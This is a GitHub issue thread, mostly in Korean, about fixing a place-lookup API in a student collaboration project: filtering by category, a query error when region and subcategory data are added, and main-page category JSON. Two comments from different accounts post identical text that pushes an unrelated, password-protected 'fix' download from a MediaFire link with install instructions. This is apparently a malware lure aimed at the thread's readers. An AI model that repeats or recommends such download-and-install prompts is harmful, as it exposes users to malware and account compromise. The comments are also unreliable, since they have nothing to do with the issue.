### ISSUE TITLE
Fix: 플레이스 조회 api 수정

### ISSUE THREAD

**Issue by bamjun** [OZ-Coding-School/oz_03_collabo-001-BE#119]
<img width="528" alt="image" src="https://github.com/user-attachments/assets/ccba2270-f9a4-4f2a-90ef-4b36200cc086">

- [x] 전체 게시물 조회에서 ,( 애개플레이스, 펫존, 키즈존 ) 카테고리별로 조회가능하게 기능 추가
- [x] place_regions, place_subcategories 테이블에 데이터 추가됐을때 조회 에러남

![image](https://github.com/user-attachments/assets/7a2b8550-6b3f-41a4-b383-9e0b2692c7a3)
<img width="177" alt="image" src="https://github.com/user-attachments/assets/9302e85c-20d5-4aac-8604-93e1cce01f05">
- [x]    메인페이지 중간 카테고리 json 추가하기

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bamjun** [comment]
애개플레이스가 전체 조회가 아니고, 펫존, 키존 둘다 해당하는 경우임..
전체 조회 + 애개플레이스 + 펫존  + 키즈존 으로 카테고리 수정하기
